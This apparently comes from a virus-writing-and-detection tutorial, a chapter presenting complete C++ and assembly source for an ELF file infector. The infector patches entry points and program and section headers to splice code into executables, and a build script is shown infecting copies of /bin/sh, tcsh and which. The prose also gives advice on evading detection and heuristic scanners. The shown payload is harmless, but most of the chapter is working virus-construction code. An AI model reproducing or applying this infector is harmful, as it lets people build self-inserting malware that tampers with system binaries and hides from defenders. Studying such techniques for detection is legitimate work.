One step closer to the edge

 

Don't be too proud of this technological terror you've constructed. The ability to destroy a planet is insignificant next to the power of the Force.

 Darth Vader

This section is about a first stage infector. A program that inserts our code into any executable we specify on the command line.

This code could easily be squeezed into a single function. But for clarity I split it into parts that manipulate a central data structure. And just for the hell of it I coded it in C++. This way I can present the pieces in random order.

Source - class Target.

#include <elf.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string>

class Target
{
public:
  Target(const char* filename);
  ~Target();
  bool isOpen() { return fd_dst != -1; }
  bool isSuitable();
  unsigned newEntryAddr();
  bool patchEntryAddr();
  bool patchPhdr();
  bool patchShdr();
  bool copyAndInfect();

private:
  enum { INFECTION_SIZE = 0x1000 };
  static const unsigned char infection[INFECTION_SIZE + 1];

  int fd_dst; /* opened write-only */
  int fd_src; /* opened read-only */

  off_t filesize;

  /* start of memory-mapped image, b means byte */
  union { void* v; unsigned char* b; Elf32_Ehdr* ehdr; } p;

  /* offset to first program header (in file) */
  Elf32_Phdr* phdr;
  
  /* offset to first byte after code segment (in file) */
  size_t top;

  /* start of host code (in memory) */
  Elf32_Addr original_entry;
};

INFECTION_SIZE

The value of INFECTION_SIZE exceeds actual code size by far. But it is the only amount that works. The reason for this is buried in the ELF specification.

[…] executable and shared object files must have segment images whose file offsets and virtual addresses are congruent, modulo the page size.

Virtual addresses and file offsets for the SYSTEM V architecture segments are congruent modulo 4 KB (0x1000) or larger powers of 2. Because 4 KB is the maximum page size, the files will be suitable for paging regardless of physical page size. […]

Let's take another look at the output of readelf. Above quote means that the last three digits of Offset must equal the last three digits of VirtAddr. This is the case for every program header.

So unless we change VirtAddr as well (which means relocation of every access to a global variable), we are stuck with 0x1000.

Target::infection

Up to now our code is intended to be stand-alone. The obvious fix is to replace the call to exit(2) with a jmp. But I think it's a better idea to let our code end with an unsuspiciuos ret instead. And we can put the matching push at the start of the code to have the actual return address at a constant location. And while we are at it, saving all registers and the flags can't be bad.

Source - infection.asm.

		BITS 32

		push	dword 0		; replace with original entry address
		pushf
		pusha

		push	byte 4
		pop	eax		; eax = 4 = write(2)
		xor	ebx,ebx
		inc	ebx		; ebx = 1 = stdout
		mov	ecx,0x08048001	; ecx = magic address
		push	byte 3
		pop	edx		; edx = 3 = three characters
		int	0x80

		popa
		popf
		ret

Command.

#!/bin/sh
nasm -f bin src/one_step_closer/infection.asm \
	-o tmp/one_step_closer/infection
ndisasm -U tmp/one_step_closer/infection \
| src/evil_magic/ndisasm.pl \
	'-identfier=Target::infection' \
	'-size=INFECTION_SIZE + 1'

Output - infection.

const unsigned char Target::infection[INFECTION_SIZE + 1] =
  "\x68\x00\x00\x00\x00"   /* 00000000: push dword 0x0       */
  "\x9C"                   /* 00000005: pushf                */
  "\x60"                   /* 00000006: pusha                */
  "\x6A\x04"               /* 00000007: push byte +0x4       */
  "\x58"                   /* 00000009: pop eax              */
  "\x31\xDB"               /* 0000000A: xor ebx,ebx          */
  "\x43"                   /* 0000000C: inc ebx              */
  "\xB9\x01\x80\x04\x08"   /* 0000000D: mov ecx,0x8048001    */
  "\x6A\x03"               /* 00000012: push byte +0x3       */
  "\x5A"                   /* 00000014: pop edx              */
  "\xCD\x80"               /* 00000015: int 0x80             */
  "\x61"                   /* 00000017: popa                 */
  "\x9D"                   /* 00000018: popf                 */
  "\xC3"                   /* 00000019: ret                  */
  ;

You might wonder why the character array has INFECTION_SIZE + 1 elements. Well, infective code can grow to exactly INFECTION_SIZE bytes, and string constants need one additional byte for zero-termination. And should the code ever exceed that limit the compiler will issue an error.

main

Nothing special here. Though you could object to the use of fprintf(3) instead of cerr. But then perror(3) is the only type of diagnostic message you will find below.

Source - main.

int main(int argc, char** argv)
{
  char** pp = argv;
  const char* p;
  while(0 != (p = *++pp))
  {
    fprintf(stderr, "Infecting copy of %s... ", p);
    Target target(p);
    if (target.isOpen()
	&& target.isSuitable()
	&& target.patchEntryAddr()
	&& target.patchPhdr()
	&& target.patchShdr()
	&& target.copyAndInfect()
    )
      fprintf(stderr, "Ok\n");
  }
  return 0;
}

The opening

Modifying a file in place, as opposed to writing a copy, is possible but difficult. And between first and final modification contents of the target is invalid. Imagine a worst-case scenario of a virus infecting /bin/sh being interrupted through a power failure (or emergency shutdown of a hectic admin).

There are a few approaches to change a file while copying.

Using MAP_PRIVATE for argument flags of mmap(2) activates copy-on-write semantics. You can read and write as if you had chosen the read-in-one-go method, but the implementation is more efficient. Unmodified pages are loaded directly from the file. On low memory conditions these pages can be discarded without saving them in swap-space.

Source - Constructor.

Target::Target(const char* src_filename)
: fd_dst(-1), fd_src(-1)
{
  const char* base = strrchr(src_filename, '/');
  std::string dst_filename(base == 0 ? src_filename : base + 1);
  dst_filename += "_infected";

  fd_src = open(src_filename, O_RDONLY);
  if (fd_src >= 0)
  {
    filesize = lseek(fd_src, 0, SEEK_END);
    if ((off_t)-1 != filesize)
    {
      p.v = mmap(0, filesize, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd_src, 0);
      if (MAP_FAILED != p.v)
      {
        fd_dst = open(dst_filename.data(), O_WRONLY | O_CREAT | O_TRUNC, 0775);
	if (fd_dst >= 0)
	  return;
	perror("open");
      }
      else
	perror("mmap");
    }
    else
      perror("lseek");
  }
  else
    perror("open");
}

Source - Destructor.

Target::~Target()
{
  if (p.v != 0)
    munmap(p.v, filesize);
  close(fd_src);
  close(fd_dst);
}

isSuitable

A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you think about polymorphism and stealth mechanisms you should go sure your code does nothing unexpected.

On the other hand exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus.

A related issue is avoidance of multiple infections. It might take a while until increased file size gets noticed. But image a /bin/sh infected with a few dozen instances of the same virus. The runtime overhead of all these instances trying to find and infect other executables (either sequentially or in parallel forked processes) will significantly slow down every single shell script.

Obviously any presence indicator can be used by heuristic scanners. My recommendation is to use an innocent property that could also be matched by regular executables. It is not a problem if your checking routine rejects some suitable targets.

For this example I just declare a bug to be a feature. Since INFECTION_SIZE is required to be 0x1000 bytes, a duplicate infection is impossible by design.

Source - isSuitable.

bool Target::isSuitable()
{
  enum
  {
    CMP_SIZE_1 = offsetof(Elf32_Ehdr, e_entry),
    CMP_SIZE_2 = offsetof(Elf32_Ehdr, e_shentsize)
    - offsetof(Elf32_Ehdr, e_flags)
  };
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  Elf32_Phdr* self_phdr = (Elf32_Phdr*)((char*)self + self->e_phoff);
  phdr = (Elf32_Phdr*)(p.b + p.ehdr->e_phoff);

  if (0 != memcmp(&p.ehdr->e_ident, &self->e_ident, CMP_SIZE_1))
    return false;
  if (p.ehdr->e_phoff != self->e_phoff)
    return false;
  if (0 != memcmp(&p.ehdr->e_flags, &self->e_flags, CMP_SIZE_2))
    return false;

  /* the type of these headers must be PT_LOAD */
  if (phdr[2].p_type != self_phdr[2].p_type)
    return false;
  if (phdr[3].p_type != self_phdr[3].p_type)
    return false;

  /* a code segment with trailing 0-bytes makes no sense, anyway */
  if (phdr[2].p_filesz != phdr[2].p_memsz)
    return false;

  top = phdr[2].p_offset + phdr[2].p_filesz;

  /* distance between code and data segment (in memory) */
  size_t delta = phdr[3].p_vaddr - phdr[2].p_vaddr - phdr[2].p_memsz - 1;
  return delta >= INFECTION_SIZE;
}

Patch entry address

Without this function the behavior of the target is not modified. This can be used for vaccination, in the true meaning of the word: Infection with a deactivated mutation makes the target immune against less friendly attackers.

Source - patchEntryAddr.

bool Target::patchEntryAddr()
{
  original_entry = p.ehdr->e_entry;
  p.ehdr->e_entry = newEntryAddr();
  return true; /* this implementations can't fail */
}

Source - newEntryAddr.

unsigned Target::newEntryAddr()
{
  return phdr[2].p_vaddr + phdr[2].p_filesz;
}

Patching program headers

Source - patchPhdr.

bool Target::patchPhdr()
{
  phdr[2].p_filesz += INFECTION_SIZE;
  phdr[2].p_memsz += INFECTION_SIZE;

  unsigned nr = p.ehdr->e_phnum;
  Elf32_Phdr* entry = phdr;
  while(nr-- > 0)
  {
    if (entry->p_offset > top)
      entry->p_offset += INFECTION_SIZE;
    entry++;
  }
  return true; /* this implementations can't fail */
}

Patching section headers

This part is not strictly required. The resulting executable works without. But readelf and strip will bitterly complain.

Source - patchShdr.

bool Target::patchShdr()
{
  unsigned nr = p.ehdr->e_shnum;
  Elf32_Shdr* shdr = (Elf32_Shdr*)(p.b + p.ehdr->e_shoff);
  while(nr-- > 0)
  {
    if (shdr->sh_offset > top)
      shdr->sh_offset += INFECTION_SIZE;
    shdr++;
  }
  p.ehdr->e_shoff += INFECTION_SIZE;
  return true; /* this implementations can't fail */
}

Copy & infect

Source - copyAndInfect.

bool Target::copyAndInfect()
{
  /* first part of original target */
  write(fd_dst, p.b, top);

  /* first byte is the opcode for "push" */
  write(fd_dst, infection, 1);

  /* next four bytes is the address to "ret" to */
  write(fd_dst, &original_entry, sizeof(original_entry));

  /* rest of infective code */
  write(fd_dst, infection + 5, INFECTION_SIZE - 5);

  /* rest of original target */
  write(fd_dst, p.b + top, filesize - top);

  return true;
}

Off we go

Command - build.

#!/bin/sh
step=${1:-one}
g++ -Wall -D PATCH_ENTRY_ADDR=\"patch_entry_addr/$step.inc\" \
	-I out/one_step_closer \
	-o tmp/one_step_closer/$step/infector \
	src/one_step_closer/*.cxx \
&& cd tmp/one_step_closer/$step \
&& ./infector /bin/sh /bin/tcsh /usr/bin/which

Output - build.

Infecting copy of /bin/sh... Ok
Infecting copy of /bin/tcsh... Ok
Infecting copy of /usr/bin/which... Ok

A simple shell script will do as test.

Command - test sh.

#! tmp/one_step_closer/one/sh_infected

echo $BASH
echo $BASH_VERSION
which which
tmp/one_step_closer/one/which_infected which
tmp/one_step_closer/one/tcsh_infected -fc 'echo $version'

Output - test sh.

ELF/home/alba/virus-writing-and-detection-HOWTO/tmp/one_step_closer/one/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm

The Force is strong with this one.